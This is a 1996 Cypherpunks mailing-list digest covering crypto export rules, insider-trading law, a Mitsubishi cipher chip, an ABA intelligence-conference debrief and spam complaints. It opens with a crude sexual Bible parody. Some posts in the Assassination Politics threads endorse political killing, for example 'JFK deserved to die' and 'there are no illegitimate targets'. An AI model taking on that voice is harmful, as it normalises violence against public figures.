young virgin daughters. Why don't you boys just come on in and fuck them right here in my house - I'll just watch!"....Later, up in the mountains, the younger daughter said: "Dad's getting old. I say we should fuck him before he's too old to fuck." So the two daughters got him drunk and screwed him all that night. Sure enough, Dad got them pregnant, and had an incestuous bastard son....Onan really hated the idea of doing his brother's wife and getting her pregnant while his brother got all the credit, so he pulled out before he came....Remember, it's not a good idea to have sex with your sister, your brother, your parents, your pet dog, or the farm animals, unless of course God tells you to. [excerpts from the Old Testament, Modern Vernacular Translation, TCM, 1996] From unicorn at schloss.li Wed Sep 25 23:49:19 1996 From: unicorn at schloss.li (Black Unicorn) Date: Thu, 26 Sep 1996 14:49:19 +0800 Subject: Taking crypto out of the U.S. In-Reply-To: <199609252211.RAA02676@manifold.algebra.com> Message-ID: On Wed, 25 Sep 1996, Igor Chudov @ home wrote: > > >> Soon I am going to be going overseas to Japan, and I want to take > > >> my notebook with me so I can keep up with everything, however, I have > > >> encrypted my hard drive and usually encrypt my mail. Is this in > > >> violation of the ITAR to keep everything the same when I go over? > > Gentlemen, us customs does not give shit about what you take out > on your diskettes. > > When I went to Russia recenty, I took PGP for DOS, and no one gave > me any problem. > > IANAL Obviously not, you've just confessed to a felony. > > - Igor. > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From snow at smoke.suba.com Wed Sep 25 23:58:35 1996 From: snow at smoke.suba.com (snow) Date: Thu, 26 Sep 1996 14:58:35 +0800 Subject: Kiddie porn on the Internet In-Reply-To: <9609211734.AA15897@vesuvius.ai.mit.edu> Message-ID: <199609260356.WAA00453@smoke.suba.com> -----BEGIN PGP SIGNED MESSAGE----- HAL wrote: > [AP drivel deleted] > Go talk to someone who is a member of an organisation like the PLO or > Hammas and pretty near the top. If you think that they would be intimidated > for a moment by AP you have another think comming. > If it could the US would have assasinated Saddam by now. It can't because it > is too difficult to find out where exactly a person will be. Assasination > attempts against Castro similarly failed. Some would say that 1) Saddam (as a problem) was _created_ by the US, and it would not be in the interest of certain people to have him die. Along the same lines, Castro, while not exactly friendly (and who can blame him) to the US, is also not a threat, and never really has been. Killing him would serve no purpose. Killing some one (the physical act, not the emotional consequences) is easy. Denyability is a little (only a little) tougher. > If you care to look at the history of Cambodia you will see that Lon Nol > assumed the presidency despite the knowledge that there was practically no ch > chance of defeating the Khumer Rouge and that he would almost certainly be dead > in less than a week as a result. There are always Captians who go down with the ship, Boys who stick their fingers in dykes, and Some fool leading the charge when the odds are overwhelming. This is either the highest calling (to fight back against all odds, and refuse to give in) or pure stupidity (he who runs away lives to fight another day). You pick. > > Both the assumption AP rests on are utterly false. It is neither possible > to assasinate people at will nor will it intimidate. If by "at will" you mean _any time_ _any where_, yeah. Short of building your own nuclear device, yeah. If you mean there are people who can't be gotten to, then no. Everyman has his price, and his coin. The second time AP is implicated in a murder, and is not stopped, then it will _start_ to intimidate. More likely it will be stopped. > In addition *ANYONE* who attempted to implement AP would be someone *I* > would regard as a tyrant and therefore a legitimate target by the rules > of AP. I would naturally consider it permissable to engage the support of > others in their suppression. Since we now live in the fantasy land of AP > I can now wipe out anyone anywhere so I eliminate all AP leaders. There are no illegitimate targets. > I think that this type of talk is incredibly dangerous. There are plenty of > people on the net who are psychos and if you spread AP drivel arround someone > is going to act on it. Probably not Jim Bell, more likely a psychopath who > lurks on the list but does not post. Doubtful. It would take more than one talented person. It would take an organization, and a permanent net connextion. This would be difficult for a lone psychopath to carry out. > If you call for people to be murdered - and let us not forget that this is > what AP is about you bear the responsibility when someone acts on it. Bullshit. Is Einstein morally responsible for the Atomic Bomb? Col. Colt for the murders that the guns he created accomplished? Ronald McDonald & his PR firm for all of the obese people in this country? > I consider AP to be very close to calling for the assasination of the > President of the USA. That is a federal crime and there is a law that > requires the investigation of any such threats. I suggest that people > think *very* carefully before engaging in this dangerous nonsense any > further. Driving 65 is very close to driving 66, which is against the law. I suggest that people think very carefully before driving at 65 miles per hour. > PS it is not censorship to stop people from advocating murder. Yes, it is. Especially when other people do it all the time, and don't get punished. Clinton just "murdered" a bunch of people in Iraq. He talked about it, then he did it. He calls it "War". So do I. I am involved in a war for _my_ rights. I will probably loose, but I must do what I determine is right. Assinating the president would not further my goals. At no time in the foreseeable future would killing the president bring me any closer to my goals. This being so, killing the president would be a stupid idea. When I joined the Marine Corps, I took an oath to protect this country, the constitution, and the government against all enemies foreign and domestic. To me, the order I wrote them is the order of presidence. The government is attacking the constitution regularly. I do what I can to stop that. If that means taking up arms as either a part of organized revolt, or a long lunatic, so be it. Petro, Christopher C. petro at suba.com snow at smoke.suba.com -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMkn+1/ee0/pvOCipAQE6vQP9E3Ra8UqMYZ3TQqyWxipJa5PDdH25ZDEv NKFPw4LDAoivF9C69criJ65lIDqNTWTOSJXY//yjyG/MkNRuS9UBzPr12PbzVafV TTY2LPXfuZoUt6AHlA6yAJpZwa3mmifRPTUQbKtc/sMIQJ3ugrZirw6/Wbzra3E+ KEclgyuiiC0= =zt4Q -----END PGP SIGNATURE----- From pgf at acadian.net Thu Sep 26 00:02:17 1996 From: pgf at acadian.net (Phil Fraering) Date: Thu, 26 Sep 1996 15:02:17 +0800 Subject: ISPs' information on users In-Reply-To: Message-ID: On Wed, 25 Sep 1996, Timothy C. May wrote: > Just why do you think I was elliptical in my comments? To type three lines > instead of just typing the name? Think about it. Oh. That organization. I thought it was simply because the topic had been done to death. Speaking of topics being done to death, I'm probably going to cease my subscription to cypherpunks as soon as my subscription to the filtered list is confirmed. (Which is why I'm not following up to Vulis' messages any more... the conversation would probably stop anyway when I stopped seeing his half of the messages, and I probably wouldn't see mine on the filtered list anyway...) > With Webcrawlers looking for names of organizations--and the Cypherpunks > archives show up on such searches--and with some organizations being very > quick to sue for perceived defamation.... This brings up something else: the last time I tried to find the cypherpunks archives on a web search they didn't show up. The last time I accessed them was in March, and they were kind-of sick then... I guess things just got too bad for the archival scheme to handle? Phil Fraering The above is the opinion of neither my internet pgf at acadian.net service provider nor my employer. 318/261-9649 From dlv at bwalk.dm.com Thu Sep 26 00:13:20 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 26 Sep 1996 15:13:20 +0800 Subject: Taking crypto out of the U.S. In-Reply-To: Message-ID: Black Unicorn writes: > On Wed, 25 Sep 1996, Igor Chudov @ home wrote: > > > > >> Soon I am going to be going overseas to Japan, and I want to take > > > >> my notebook with me so I can keep up with everything, however, I have > > > >> encrypted my hard drive and usually encrypt my mail. Is this in > > > >> violation of the ITAR to keep everything the same when I go over? > > > > Gentlemen, us customs does not give shit about what you take out > > on your diskettes. > > > > When I went to Russia recenty, I took PGP for DOS, and no one gave > > me any problem. > > > > IANAL > > Obviously not, you've just confessed to a felony. And I've just forwarded Igor's confession to the Right Reverend Colin James III. Looks like we've got our ITAR test case. :-) --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From azur at netcom.com Thu Sep 26 00:13:23 1996 From: azur at netcom.com (Steve Schear) Date: Thu, 26 Sep 1996 15:13:23 +0800 Subject: Insider Trading - What constitutes "Disclosure" ? Message-ID: >Often the choice faced by the investor who has material non-public >information is characterized as "disclose or abstain," meaning that the >investor may either trade after disclosing or abstain from trading on the >information. > >A few people have asked me what constitutes disclosure. > >I've not researched the latest cases, but the generally accepted "best >description" can be found in SEC v. Texas Gulf Sulpher Co., 401 F.2d 833 >(2d Cir.1968), cert. denied. > > The reading of a news release, which promoted Coates into >action, is merely the first step in the process of dissemination required >for compliance with the regulatory objective of providing all investors >with an equal opportuinity to make informed investment judgements. >Assuming that the contents of the official release could have been >instantaneously be acted upon, at the minimum Coates should have waited >until the news could reasonably have been expcted to appear over the media >of widest circulation, the Dow Jones broad tape, rather than hastening to >insure an advantage to himself and his broker son-in-law. > It would seem to me that if I operated an open listserver, upon which financial information regularly appeared and which any trader (serious or otherwise) might subscribe, my information should be held in the same legal regard as DJ. If not, the SEC has in effect created a monopoly for Dow-Jones and its ilk and effectively impede or excluded other news sources (e.g., Internet feeds) as legit means for generating market awareness, and therefore revenue. I and many others occassionally trade on public information from narrower sources than DJ (e.g., market newsletters). Sometimes DJ and others pick up info from these sources and sometimes they don't (or not immediately). Does that mean those trading on this data published not yet picked up by DJ may be trading illegally? If so, this is totally unjust and wrongheaded. -- Steve From tcmay at got.net Thu Sep 26 00:14:17 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 26 Sep 1996 15:14:17 +0800 Subject: Taking crypto out of the U.S. Message-ID: At 10:11 PM 9/25/96, Igor Chudov @ home wrote: >> >> Soon I am going to be going overseas to Japan, and I want to take >> >> my notebook with me so I can keep up with everything, however, I have >> >> encrypted my hard drive and usually encrypt my mail. Is this in >> >> violation of the ITAR to keep everything the same when I go over? > >Gentlemen, us customs does not give shit about what you take out >on your diskettes. > >When I went to Russia recenty, I took PGP for DOS, and no one gave >me any problem. I initially responded to the first questioner with a simple "No." (Sent privately.) This answer, because of several points: - encrypted data, his hypo, is not illegal to export under _any_ circumstances - the "personal use" exemption - the Matt Blaze example, where it was obvious U.S. Customs was basically neither interested in nor set up to process "crypto export" situations - the basic fact that U.S. Customs _rarely_ does inspections of outgoing stuff As I've said before, on a trip to Monte Carlo in early '95, I carried out a bunch of magneto-optical disks, containing more than a gigabyte of stuff, including a bunch of crypto products, etc. Needless to say, I boarded my Air France flight without a single glance from U.S. Customs. They were nowhere in sight, in fact, on the outgoing side. I could have had suitcases full of cash, briefcases full of stock certificates, and 100 gigabytes of software. (A college friend of mine is married to a Brooklyn DA. One of the cases she described to me involved prosecuting a guy for smuggling U.S. currency out of the country. She hinted that the only reason he was searched as he left the country was because of a related case.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From dlv at bwalk.dm.com Thu Sep 26 00:21:30 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 26 Sep 1996 15:21:30 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! In-Reply-To: Message-ID: The Deviant writes: > > > It's widely believed that the New Orleans Mafia (the source of my recent > > > statement about body decomposition in Louisiana swamps) was a prime drive > > > in the assasination of the late President John F. Kennedy. > > > > > > I think it's fairly safe to say that having done this didn't do them a > > > damn bit of good. It didn't do anyone else a damn bit of good. > > > > JFK deserved to die. > > Wile i neither agree nor disagree with your point, it does seem a bit > irrelavant, but thats just MHO. Well - this thread has very little crypto-relevance (AP itself has questionable crypto-relevance, IMO, and should be discussed in talk.politics.assassination, carried by every honorable Usenet site). But as far as AP is concerned, clearly JFK's death (quite deserved) did not deter other scum like him from seeking political office. Now, if he had been tried (for treason, murder, etc) and died like a criminal, not like a hero, on national TV, that would have done a lot more damage to the image of the office of the president of the united states. Just look back at what Nixon's resignation did. I believe in public hangings after a fair trial. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From haggis at brutus.bright.net Thu Sep 26 00:29:15 1996 From: haggis at brutus.bright.net (Hamish) Date: Thu, 26 Sep 1996 15:29:15 +0800 Subject: your mail Message-ID: Hey Look, the president of the U.S. is on this mailing list!!!!!!!!! Let's tell him what we think of him and his defense department, and his secret service and his. . .well, entire administration and laws (what about that dandy CDA?????????) From sophi at best.com Thu Sep 26 00:36:07 1996 From: sophi at best.com (Greg Kucharo) Date: Thu, 26 Sep 1996 15:36:07 +0800 Subject: Dyson on anonymity (in WSJ article on our challenge to GA net law) In-Reply-To: <199609252017.NAA24875@eff.org> Message-ID: <3249BC0D.7C6368F4@best.com> I'm glad to see that Ms. Dyson has come around to our way of thinking:-). Stanton McCandlish wrote: > > FYI: > > [...] > Esther Dyson, president of high-tech publisher EDventure > Holdings Inc. and chairwoman of the Electronic Frontier > Foundation, a high-tech civil liberties organization that > is a co-plaintiff in the lawsuit, calls the Georgia law > "brain-damaged and unenforceable," and adds: "How are they > going to stop people from using fake names? Anonymity > shouldn't be a crime. Committing crimes should be a crime." > [...] > > -- > Stanton McCandlish >

mech at eff.org >

Electronic Frontier Foundation >

Online Activist From sophi at best.com Thu Sep 26 00:39:00 1996 From: sophi at best.com (Greg Kucharo) Date: Thu, 26 Sep 1996 15:39:00 +0800 Subject: Bernstein hearing: The Press Release In-Reply-To: Message-ID: <3249BDB5.1A39AD0D@best.com> I fail to see how the Executive can simply avoid the authority and oversight of the Judicial. Are there other circumstances of this? From my constitutional reading the Judiciary has the right to review any law passed by Congress. The Executive only has the power to enforce, not to unilaterally pass rules unrelated to enforcement. Declan McCullagh wrote: > > At today's SAFE crypto hearing in the House, Congressperns quizzed > Gorelick about what the fuck the administration is trying to do by having > their lackies attach amendments to the omnibus export act that would > prevent judicial review of Commerce Dept export control decisions. It's > already cleared the House. > > "no court shall have power or jurisdiction to review any such decision by > an action in the nature of mandamus or otherwise." > > Bastards. > > -Declan > From jimbell at pacifier.com Thu Sep 26 00:45:25 1996 From: jimbell at pacifier.com (jim bell) Date: Thu, 26 Sep 1996 15:45:25 +0800 Subject: Mitsubishi MISTY LSI Message-ID: <199609260534.WAA00788@mail.pacifier.com> At 08:55 PM 9/25/96 -0700, Bill Frantz wrote: >> Nikkei English News, 24 September 1996. >> >> [Mitsubishi] fabricated the chip as a gate array using a >> 0.5 micron CMOS process and its own proprietary >> encryption algorithm MISTY. Operating at a maximum >> input/output speed of 40 megahertz, the chip can handle >> 32 bits per clock cycle. > >Does anyone have a reason not to consider this algorithm snake oil? e.g.: >Was it developed by a well known cryptographer? >Has it been vetted by someone/some organization with reputation? >I other words, why should we trust it? There's not nearly enough information provided to know for sure. However, I'd think that any company which went to the trouble to build such a chip (custom, 0.5 micron process, etc) would go to the little extra effort to verify the algorithm is secure. Generally, hardware is held to a higher standard because the difficulty of repair is higher: Usually, you have to replace a chip. Jim Bell jimbell at pacifier.com From azur at netcom.com Thu Sep 26 00:50:48 1996 From: azur at netcom.com (Steve Schear) Date: Thu, 26 Sep 1996 15:50:48 +0800 Subject: Insider Trading - What constitutes "Disclosure" ? Message-ID: >Posted-Date: Thu, 26 Sep 1996 00:40:14 -0400 >Date: Thu, 26 Sep 1996 00:40:14 -0400 (EDT) >From: Black Unicorn >X-Sender: unicorn at polaris >To: Steve Schear >Subject: Re: Insider Trading - What constitutes "Disclosure" ? >MIME-Version: 1.0 > >On Wed, 25 Sep 1996, Steve Schear wrote: > >> >Often the choice faced by the investor who has material non-public >> >information is characterized as "disclose or abstain," meaning that the >> >investor may either trade after disclosing or abstain from trading on the >> >information. >> > >> >A few people have asked me what constitutes disclosure. >> > >> >I've not researched the latest cases, but the generally accepted "best >> >description" can be found in SEC v. Texas Gulf Sulpher Co., 401 F.2d 833 >> >(2d Cir.1968), cert. denied. >> > >> > The reading of a news release, which promoted Coates into >> >action, is merely the first step in the process of dissemination required >> >for compliance with the regulatory objective of providing all investors >> >with an equal opportuinity to make informed investment judgements. >> >Assuming that the contents of the official release could have been >> >instantaneously be acted upon, at the minimum Coates should have waited >> >until the news could reasonably have been expcted to appear over the media >> >of widest circulation, the Dow Jones broad tape, rather than hastening to >> >insure an advantage to himself and his broker son-in-law. >> > >> >> It would seem to me that if I operated an open listserver, upon which >> financial information regularly appeared and which any trader (serious or >> otherwise) might subscribe, my information should be held in the same legal >> regard as DJ. > >I disagree. If the information appears only on your listserver it will >not, in my view, be considered released. You'll note above that the >reading of a news release, which eventually propogated to Canada and New >York, still was not enough to limit liability for Coates. I hardly think >a small circulation electronic mailing list will be considered sufficent >either. > >> If not, the SEC has in effect created a monopoly for >> Dow-Jones and its ilk and effectively impede or excluded other news sources >> (e.g., Internet feeds) as legit means for generating market awareness, and >> therefore revenue. > >Correct. > >> I and many others occassionally trade on public >> information from narrower sources than DJ (e.g., market newsletters). > >But you and others are (I hope) not insiders or direct tipees. >You also note that you trade on "public information." So long as you keep >it that way you should be alright. > >You will be putting yourself in a interesting position if material >non-public information ever shows up on your newsletter and is later the >subject of investigation. > >> Sometimes DJ and others pick up info from these sources and sometimes they >> don't (or not immediately). Does that mean those trading on this data >> published not yet picked up by DJ may be trading illegally? If so, this is >> totally unjust and wrongheaded. > >The case mans what it says. Until the information reaches the sources of >largest distribution it is still "non-public." What is a source of >largest distrubution? Ask a judge. I would simply be careful and >prudent. You could easily be in trouble for trading on information which >you "knew or should have known was material, non-public information." > >There is, of course, a distinction between the trader who reads an article >and trades on it and a trader who hears over a mailing list from a >corporate insider that a major fraud in the company has been discovered. > >If your newsletter carries hints of the big merger before it happens and a >trader later points to it as the source of his tip, you could be in >serious trouble. God forbid they get it in your head that you are >distributing inside information. Of course you can imagine the headlines. > >"Internet crime network foiled. Hundreds of subscribers capitalize on >inside information." > >As for unjust and wrongheaded, welcome to the American concept of >securities regulation. > >> -- Steve > >-- >I hate lightning - finger for public key - Vote Monarchist >unicorn at schloss.li > From unicorn at schloss.li Thu Sep 26 00:56:06 1996 From: unicorn at schloss.li (Black Unicorn) Date: Thu, 26 Sep 1996 15:56:06 +0800 Subject: ABA Conference on Law Enforcement and Intelligence - Debrief Message-ID: The American Bar Association Standing Committee on Law and National Security - Law Enforcement and Intelligence Conference - Debrief The ABA's Standing Committee on Law and National Security is one of the more successful Committees to come out of the ABA. It's conferences and early morning breakfast briefings and lectures are attended by some of the leading experts in the fields of National Security, Law Enforcement, and Intelligence and no small number of the beltway power elite. I'm not sure if many people outside the legal community understand the degree to which attorney's have impacted and thrived in both the law enforcement and the intelligence communities. In fact many, if not most, CIA case officers and station chiefs, as well as field operatives, are attorneys or have law degrees. Other intelligence organizations are no different. It should come as little surprise then if a committee of the ABA should happen to attract a surprising amount of intelligence professionals. This conference was no exception. Spooks, Feds, Legislators, and even a few Kooks were in attendance. Members of the British, American, Canadian, and German intelligence communities were in attendance. A colleague and I attended the majority of the conference and except where noted the reflections below are a summary of our collective notes and thoughts on the subject matter discussed. I'm taking a broad view of relevance to cypherpunks, but I will omit that which seems clearly not of direct or somewhat indirect interest. Part One: A Changed World for Law Enforcement and Intelligence in the 21st Century Thursday, September 19 7:45 AM Registration and Continental Breakfast 8:15 AM Welcome Remarks Paul Schott Stevens Chair ABA Standing Committee on Law and National Security 8:30 AM I. An Overview of a Changing World. *The Traditional Relationship of Law Enforcement, Foreign Intelligence and National Security (1945-1995): *How Have Other nations Balanced Legal and National Security Requirements and Responded to a Changed World. *The Changed Threats to U.S. National Security- New Problems and Priorities Elizabeth R. Rindskopf Bryan Cave Former General Counsel, Central Intelligence Agency Member, Standing Committee on Law and National Security Ms. Rindskopf outlined the three classic "periods" of intelligence community and mission development in U.S. history and set the stage for the discussions to follow. Interesting subjects she did touch on included section 715 of the Senate intelligence bill. The section allows the law enforcement community to request assistance from foreign intelligence in collection efforts on foreigners outside of the United States. The BNC and BCCI scandals were discussed as a backdrop of the hazards of law enforcement and intelligence separation. Zoe Baird Senior Vice President and General Counsel Atena Life and Casualty Company Member, Standing Committee on Law and National Security. Ms. Baird discussed the dangers presented by globalization and new technologies. She highlighted the point that crime globalization often follows corporate globalization and the manner in which a single individual's ability to cause harm has increased in scope (The NYNEX Hack). Also interesting was her discussion of the manner in which the more organized elements of criminal activity worked to take advantage of the very open society in the United States (Fund raising, publications, anonymous communications). Those activities once merely violations of criminal law are, she argued, now increasingly national security concerns and that national security events impact elections in very dramatic and direct ways (Atlanta and Israel bombings as examples). Crime, she pointed out, gets about an 80% response in the polls, where as "National Security and Foreign Policy" get perhaps a 3% response. Merging these elements together serves an administration. She also pointed out the trend toward making these issues generally more accessible to the public. (Specifically by use of language. "Transnational threats"- which was a term of art for non-state terrorism and organized crime- becomes "Global Crime" or "Global Lawlessness." Ms. Baird ended by asking how the firewalls between Law Enforcement and Intelligence could be rebuilt with these new considerations in mind. I considered her a balanced cynic. She managed to get across some very realpolitik notions without much murmuring from the (limited) civil libertarian crowd. David Bickford Former Legal Adviser to the British Intelligence Services (MI5- MI6) Mr. Bickford has in past served as a conduit between British Intelligence services and the United States. He is well known and respected among the American and European Intelligence communities. Knowing Mr. Bickford I can also say that he pays a great deal of attention to who his audience is and speaks to their interests with disarming accuracy. His discussion is important because it is a good insight into what the policy makers in the United States are looking at. He began by highlighting the new international nature of crime. No longer is it confined to power blocs. "Multi-jurisdictional illegality" is increasingly a concern. New highspeed communications channels are a contributor and organized crime groups are possessed of extremely advanced administration abilities. They are leaner and meaner because they use computers, encryption, communications, and use up less resources in administration. The ability to make the organization smaller also makes it harder to penetrate. In this environment, international cooperation is essential. He called for more active and expansive extraterritorial jurisdiction for certain crimes, and lamented his own country's lack of enthusiasm for this concept though they are slowly "coming around." His solutions included the labeling of organizations, even when they are not geographically based, as "illegal international organizations" and using all means to combat them. He envisions a wide cooperation by the G7 to accomplish this, leaving such organizations with no safe haven. Sanctions regimes formerly employed only as against "rogue states" and countries in disfavor should be employed to destroy these illegal international organizations wherever they are. He indicated that the other G7 states should build on the recent Clinton Executive Order which seizes the assets of such organizations which may be located in the jurisdictions of the G7. He called for measures to deny these assets access to the major securities and international finance markets and proposed that only organizations like the NSA could confront and complete these tasks. Intelligence, he argued, is the only organization that can keep up with international crime and as a result there should be developed court processes to introduce intelligence into criminal cases while protecting the more sensitive information (sources and methods) as irrelevant. "Evil men" have taken an "early lead." $500 billion a year comes out of the United States alone in money laundering. 400 billion in assets is attributed to drug cartels, 80% of which are Cali Cartel assets. There are over 250 international Russian criminal organizations currently operating. Mr. Phillip Heymann James Barr Ames Professor and Director, Center for Criminal Justice Harvard Law School Member: Standing Committee on Law and National Security [Didn't find his comments particularly relevant] II. Political Challenges in the World Environment *Breakup of the U.S.S.R. *Loss of National Sovereignty and Control by Nation States *Erosion of National Legal Systems Military Threats at the Subnational Level: The Terrorism Dilemma (This looked very much like the section given to the Soviet Analysts, who no longer have much of a job to do). Mr. Morton H. Halperin Senior Fellow Council on Foreign Relations Former Special Assistant to the President and Senior Director for Democracy, National Security Council [Canceled] Mr. Peter Rodman Director, National Security Programs Nixon Center for Peace and Freedom and Former Deputy Assistant to the President for National Security Affairs Mr. Rodman discussed the new "trans-national areas." Terrorism, corruption, economic and criminal activity. He discussed the side effects of collapsing empires (the rise of organized crime to enforce property and contract rights that cannot be enforced by the government, the shift of power to the local from the regional and executive areas) and discussed, in this context, the importance of avoiding petty squabbles over issues like trade and the like because they threaten the more important strategic cooperation that will be necessary to battle global and transnational criminal activity. Ms. Jessica E. Stern Consultant Lawrence Livermore National Laboraory and Former Director, Russian, Uklrainian and Eursian Affairs, National Security Council Ms. Stern discussed the severe proliferation problems presented by a weak Russia, particularly the weakening of MPCA (Material Protection Control and Accounting). 11:15 AM III. Technical and Practical Changes in the Relevant World Environment *Global Technologies Emerge *"Equal Access" to Advanced Technology by State and Private Actors * Change in Size, Type and Location of National Security Threats: Challenge for Modern Intelligence and Law Enforcement Stewart Baker Steptoe and Johnson Former General Counsel, National Security Agency Member, Standing Committee on Law and National Security Mr. Baker's remarks were brief, but he discussed the evening of the odds with respect to government and private organizations caused by technology. Admiral William O. Studeman United States Navy (retired) Former Acting Director of Central Intelligence Admiral Studeman discussed "Information Warfare," pointing out specifically that advanced societies were more vulnerable because of their financial, banking and revenue system's dependence on computer. Power, air traffic control, public safety and media were also mentioned in passing. Admiral Studeman went on to call for more intense secrecy in law enforcement (not intelligence) as to collection methods and new technology. He called passionately for funding for the DigiTel program as well as a "key escrow" policy. Anthony Oettiger Chairman, Program on Information Resources Policy Harvard University Mr. Oettinger was perhaps the only moderate speaker in the conference. He discussed Executive Order 13010 (establishing the Critical Infrastructure Protection organization) and called for more private sector input in policy making (Banks, markets, businesses want to make their own security arrangements, and are not very interested in paying much attention to the suits at their door who claim 'Hi, we're from the government, we are here to help..' He pointed out the difference between the movements in Airline Security (which is drifting from privately maintained, to publicly maintained).and Internet security (which is doing the reverse). He called for reasoned response to the new threats which did not commit expensive intelligence and law enforcement resources to combat the single hacker. Proper threat assessing is important, and intelligence should be used to pinpoint the weak points. Walter Pincus National Security Affairs Reporter The Washington Post Mr. Pincus asked if (a lovely analogy to chicken little and osterages with their heads in the sand). His most interesting remarks regarded the wisdom of dedicating such substantial resources to repell non-strategic efforts to disrupt networks. (Hackers, lone gunmen, etc.) He questioned. Doesn't, afterall, a strategic attack require much more preperation? Should we really allow the personality of e.g., Louis Freeh, who has the capital dazzled from his glow, to direct these resources? 12:30 PM Luncheon John Deutch Director, Central Intelligence Agency [Cancelled in the wake of the investigation into alleged CIA drug connections in California] Part Two: The Implications of a Changed World for a Set of Critical Decisions 2:00 PM IV. Protections Against New High Tech Dangers; Problems of Encryption, Information Warfare and Computer Theft [forthcoming - remainder of conference and analysis] From Adamsc at io-online.com Thu Sep 26 00:56:50 1996 From: Adamsc at io-online.com (Adamsc) Date: Thu, 26 Sep 1996 15:56:50 +0800 Subject: Taking crypto out of the U.S. Message-ID: <19960926055511781.AAA230@GIGANTE> On Wed, 25 Sep 1996 06:26:31 -0500 (EST), Adam Shostack wrote: >| >Theres a personal use exemption. Michael Froomkin's web page has a >| >pointer to it. >| What if your laptop gets "stolen"? Or you sell it for a plane ticket home >| after your wallet gets pinched? >You're required to report it to the Feds. RTFU. Yeah, but you can't be persecuted. So what happens if Joe-Cryptographer writes a *great* NSA-stumping crypto program - not for export - and it just happens to get pinched (The police might even recover it!)? Outside distribution w/o penalties... # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # | send mail with subject "send PGPKEY" From dthorn at gte.net Thu Sep 26 00:58:39 1996 From: dthorn at gte.net (Dale Thorn) Date: Thu, 26 Sep 1996 15:58:39 +0800 Subject: More proposals for European censorship In-Reply-To: <960925181200_529562477@emout03.mail.aol.com> Message-ID: <324A17BE.4C09@gte.net> PhneCards at aol.com wrote: > Did you know this company is using your email address as part of > an unlawful email bomb? I signed up for this Internet service through GTE. I haven't got the foggiest idea what a "email bomb" is, nor do I care. I can't possibly be doing anything illegal by logging on to this service and receiving and posting email to cypherpunks, and if someone else is, why are you telling me? > I would advise you to write to them at cypherpunks at toad.com > and owner-cypherpunks at toad.com and advise them to stop > using your email address for this type of activity. I don't know what you're talking about. Maybe if you dropped the "Computerese" and wrote in plain English, I could understand what you're saying. Are you saying (by analogy) that if someone posted my picture on a milk carton claiming I was lost, that I'd have to write someone a letter of explanation to say I wasn't lost? And how do I *really* know I'm not lost, anyway? I'd prefer that you just leave me alone. > It is illegal to use a invalid return email address. If this > continues, I will > be forced to prosecute the return email address - which they are > making to look like you. Well, this is all quite fascinating, but it's not what I signed up for. Are you suggesting that I would be obliged to witness against someone? I've been in court before, and I know how lawyers like to insist on Yes or No answers, but it rarely works for me. I just get so confused.... > Below is the letter that I received in my email box > In a message dated 96-09-25 13:58:31 EDT, you write: > >Subj: Re: More proposals for European censorship > >Date: 96-09-25 13:58:31 EDT > >From: dthorn at gte.net (Dale Thorn) > >Sender: owner-cypherpunks at toad.com > >To: asgaard at Cor.sos.sll.se (Asgaard) > >CC: cypherpunks at toad.com [text deleted] From dthorn at gte.net Thu Sep 26 01:04:25 1996 From: dthorn at gte.net (Dale Thorn) Date: Thu, 26 Sep 1996 16:04:25 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] In-Reply-To: <199609260141.SAA15334@mail.pacifier.com> Message-ID: <324A1C11.5E19@gte.net> jim bell wrote: > At 07:24 AM 9/24/96 -0700, Dale Thorn wrote: > >Lessee if I have this right, now. We have basically three scenarios: > >1. Allow the status quo to continue (the justice system scam now run > >by Janet Reno/Louis Freeh types et al. > >2. Allow the people some democracy in applying justice through AP. > >3. Sometime in the future, build the Gort(?) robots, as in The Day > >The Earth Stood Still, and let them do the job. > That's about it. I long ago noticed the similarity between AP and the > fictional Gort. > Problem is, Gort would have to be programmed. How would you write such > a program? Governments would want their hand in it. They'd insist on > "government exceptions" to rules, like: "All violence is forbiddden! > (except for violence by duly authorized government employees!)" > Not very practical. Indeed it may not be practical to try such a program on current computers. I've had thoughts for some time about an analogy where each person in a civilization represents a cell in a single brain, and so on, so perhaps AP is merely a portion of the program for this "brain". As to what happens when you try to concentrate a disproportionate amount of the programming task into a few hands, that appears to be the situation we have now. From Adamsc at io-online.com Thu Sep 26 01:09:15 1996 From: Adamsc at io-online.com (Adamsc) Date: Thu, 26 Sep 1996 16:09:15 +0800 Subject: A daily word of caution in reference Tim C[unt] May Message-ID: <19960926060948234.AAA88@GIGANTE> On Wed, 25 Sep 1996 18:11:22 -0400, PhneCards at aol.com wrote: >Did you know this company is using your email address as part of >an unlawful email bomb? >I would advise you to write to them at cypherpunks at toad.com >and owner-cypherpunks at toad.com and advise them to stop >using your email address for this type of activity. Hmmmm... Unlawful email bomb? My understanding is that the entire problem of spaming, which you reportedly enage in (and admitted such in another message), is at best a grey area. Otherwise you'd probably be needing that legal department to defend yourself. I'd suggest you read up on the concept of a mailing list. cyperpunks at toad.com is one of those. If you send a message there, it'll reach all 1400 people who've actually signed up (note the difference from spamming? They *requested* it!). To me it looks like you got subscribed. send a message to majordomo at toad.com with the text of "unsubscribe cypherpunks" and you'll be removed. Speaking of which, remove me from the list you mentioned in your other message.... >It is illegal to use a invalid return email address. Really? I must have missed the E-Mail Regulations Act of 1996 . . . Speaking of which, Reply-to: adamsc at io-online.com (Chris Adams) must be a valid address; your inane message reached me, right? >Below is the letter that I received in my email box [Deleted] Hmmmm... The message I sent to the list actually got distributed to the list. That majordomo thingie must work, after all... # Chris Adams | 